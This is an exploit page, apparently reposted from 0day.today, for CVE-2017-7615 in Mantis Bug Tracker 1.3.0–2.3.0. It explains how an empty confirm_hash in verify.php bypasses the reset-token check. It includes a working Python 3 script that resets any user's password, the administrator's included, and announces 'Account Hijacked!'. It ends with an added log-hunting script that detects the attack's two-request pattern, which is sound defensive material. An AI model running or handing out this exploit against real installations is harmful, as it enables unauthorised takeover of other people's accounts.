Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset Exploit

Published 17 Apr 2017. Reported by hyp3rlinx. Type: zdt. Source: 0day.today.

Mantis Bug Tracker 1.3.0/2.3.0 - Remote Password Reset Exploit allows hijacking any accoun

Related entries (source: title, published):
- Circl: CVE-2017-7615 (16 Apr 2017)
- CNVD: MantisBT Arbitrary Password Reset Vulnerability (18 Apr 2017)
- Check Point Advisories: Mantis Bug Tracker verify.php confirm_hash Remote Password Reset (CVE-2017-7615) (15 May 2017)
- CVE: CVE-2017-7615 (16 Apr 2017)
- Cvelist: CVE-2017-7615 (16 Apr 2017)
- Exploit DB: Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset (16 Apr 2017)
- Exploit DB: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated) (18 Sep 2020)
- exploitpack: Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset (16 Apr 2017)
- Github Security Blog: MantisBT allows arbitrary password reset (13 May 2022)
- Metasploit: MantisBT password reset (9 Jul 2017)

[+] Credits: John Page a.k.a hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
[+] ISR: ApparitionSec            
  
 
 
Vendor:
================
www.mantisbt.org
 
 
 
Product:
==================
Mantis Bug Tracker
v1.3.0 / 2.3.0
 
MantisBT is a popular free web-based bug tracking system. It is written in PHP and works with MySQL, MS SQL, and PostgreSQL databases.
 
 
Vulnerability Type:
===============================
Pre-Auth Remote Password Reset
 
 
 
CVE Reference:
==============
CVE-2017-7615
 
 
 
Security Issue:
================
The MantisBT account verification page, verify.php, allows resetting ANY user's password.
A remote, unauthenticated attacker can hijack ANY Mantis account with plain HTTP requests, needing only to guess the victim's numeric user ID (the administrator is normally id=1) and username.
 
Vulnerable code:
 
In verify.php line 66:
 
if( $f_confirm_hash != $t_token_confirm_hash ) {
     
trigger_error( ERROR_LOST_PASSWORD_CONFIRM_HASH_INVALID, ERROR );
 
}
 
This check is meant to confirm that the confirm_hash sent by the requester matches the token stored for the account.
It uses PHP's loose inequality (!=). When no password-reset token exists for the target user, token_get_value() returns null, and in PHP the expression '' != null evaluates to false.
Supplying an empty confirm_hash therefore passes the check for any account, whether or not a reset was ever requested.
 
e.g.
 
http://127.0.0.1/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
 
verify.php then logs the requester in as that user and presents the account update form, so a follow-up POST to account_update.php sets a new password and hijacks ANY MantisBT account.
 
All versions from 1.3.0 up to and including 2.3.0 are affected; 1.2.x versions are not affected. The fix shipped in 2.3.1 and, for the 1.3 branch, in 1.3.11.
 
 
References:
============
https://mantisbt.org/bugs/view.php?id=22690#c56509
 
 
 
POC Video URL:
==============
https://vimeo.com/213144905
 
 
 
Exploit/POC:
=============
# Ported to Python 3 (the original PoC was Python 2). Two fixes to the
# original: the supplied User ID is actually used in request 2 (the PoC
# hard-coded '1'), and the CSRF token is located with a regex instead of
# fixed string offsets, which broke on any change to the page layout.
import http.cookiejar
import re
import sys
import time
import urllib.parse
import urllib.request

print('Mantis Bug Tracker >= v1.3.0 - 2.3.0')
print('1.2.x versions are not affected')
print('Remote Password Reset 0day Exploit')
print('Credits: John Page a.k.a HYP3RLINX / APPARITIONSEC\n')

IP = input("[Mantis Victim IP]>")
realname = input("[Username]")        # Must be known or guessed.
verify_user_id = input("[User ID]")   # Admin = 1
passwd = input("[New Password]")

# Install path as used in the original PoC; adjust for other deployments.
BASE = 'http://' + IP + '/mantisbt-2.3.0/'

# One cookie jar for both requests: verify.php logs us in as the victim,
# and that session cookie must accompany the follow-up POST.
cookies = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(
    urllib.request.HTTPRedirectHandler(),
    urllib.request.HTTPHandler(debuglevel=0),
    urllib.request.HTTPSHandler(debuglevel=0),
    urllib.request.HTTPCookieProcessor(cookies))

# REQUEST 1: the empty confirm_hash bypasses the token check and the
# response is the account_update form carrying the account_update_token.
TARGET = BASE + 'verify.php?id=' + verify_user_id + '&confirm_hash='
res = opener.open(TARGET)
page = res.read().decode('utf-8', 'replace')

# Hidden field rendered by MantisBT's form_security_field(); attribute
# order name="..." value="..." assumed as in 2.3.0.
m = re.search(r'name="account_update_token"\s+value="([^"]+)"', page)
if not m:
    sys.exit('account_update_token not found: target is probably patched')
ACCT_TOKEN = m.group(1)

time.sleep(0.3)

# REQUEST 2: hijack the account by setting a new password.
TARGET = BASE + 'account_update.php'
values = {'verify_user_id': verify_user_id,
          'account_update_token': ACCT_TOKEN,
          'realname': realname,
          'password': passwd,
          'password_confirm': passwd}

data = urllib.parse.urlencode(values).encode('ascii')
response = opener.open(TARGET, data)
the_page = response.read()
http_headers = response.info()

#print(http_headers)
print(response.getcode())
print('Account Hijacked!')
time.sleep(2)
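On the defensive side, the exploit leaves a distinctive two-request trail in the web server's access log: a GET to verify.php whose confirm_hash parameter is present but empty, followed shortly by a POST to account_update.php from the same client. The following Python 3 script is an added example for hunting that pattern in Apache/nginx "combined" format logs; it is not part of the original advisory or of MantisBT. The log lines are constructed, the /mantisbt-2.3.0/ path is simply the one the PoC uses, and the five-minute correlation window is an arbitrary choice.

```python
"""Hunt combined-format access logs for the CVE-2017-7615 request pattern.

Added example; not code from the advisory or from MantisBT. The log lines
below are constructed, and /mantisbt-2.3.0/ is just the path the PoC uses.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Combined log format: client ident user [timestamp] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Constructed sample: one attack from 203.0.113.7 (GET with empty hash, then
# the password-changing POST), a legitimate reset carrying a real hash, and a
# request that omits confirm_hash altogether (not the exploit's request).
SAMPLE_LOG = """\
198.51.100.2 - - [17/Apr/2017:10:00:01 +0000] "GET /mantisbt-2.3.0/login_page.php HTTP/1.1" 200 2043 "-" "Mozilla/5.0"
203.0.113.7 - - [17/Apr/2017:10:01:05 +0000] "GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash= HTTP/1.1" 200 5120 "-" "Python-urllib/3.6"
203.0.113.7 - - [17/Apr/2017:10:01:06 +0000] "POST /mantisbt-2.3.0/account_update.php HTTP/1.1" 302 0 "-" "Python-urllib/3.6"
198.51.100.9 - - [17/Apr/2017:10:02:00 +0000] "GET /mantisbt-2.3.0/verify.php?id=42&confirm_hash=6f1d2e3c4b5a69788796a5b4c3d2e1f0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.8 - - [17/Apr/2017:10:03:00 +0000] "GET /mantisbt-2.3.0/verify.php?id=2 HTTP/1.1" 200 5120 "-" "curl/7.52"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # keep_blank_values=True so "confirm_hash=" survives as an empty value
    rec["query"] = parse_qs(url.query, keep_blank_values=True)
    return rec


def is_empty_hash_verify(rec):
    """True for GET verify.php?...&confirm_hash= (the bypass request itself)."""
    if rec["method"] != "GET" or not rec["path"].endswith("/verify.php"):
        return False
    hashes = rec["query"].get("confirm_hash")
    if hashes is None:  # parameter absent: not the exploit's request
        return False
    return all(h.strip() == "" for h in hashes)


def find_hijack_sequences(log_text, window=timedelta(minutes=5)):
    """One finding per bypass request, noting whether the same client then
    POSTed to account_update.php within `window` (password actually changed)."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    findings = []
    for i, rec in enumerate(records):
        if not is_empty_hash_verify(rec):
            continue
        deadline = rec["ts"] + window
        followed = any(
            r["ip"] == rec["ip"]
            and r["method"] == "POST"
            and r["path"].endswith("/account_update.php")
            and rec["ts"] <= r["ts"] <= deadline
            for r in records[i + 1:]
        )
        findings.append({
            "ip": rec["ip"],
            "user_id": rec["query"].get("id", ["?"])[0],
            "time": rec["ts"].isoformat(),
            "password_changed": followed,
        })
    return findings


if __name__ == "__main__":
    for f in find_hijack_sequences(SAMPLE_LOG):
        print("ALERT" if f["password_changed"] else "PROBE", f)
```

Run against the real log with `find_hijack_sequences(open(path).read())`. A bypass GET without the follow-up POST is still worth a look (a scanner or an interrupted attempt), which is why the script reports it separately rather than dropping it.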

#  0day.today [2018-03-09]  #
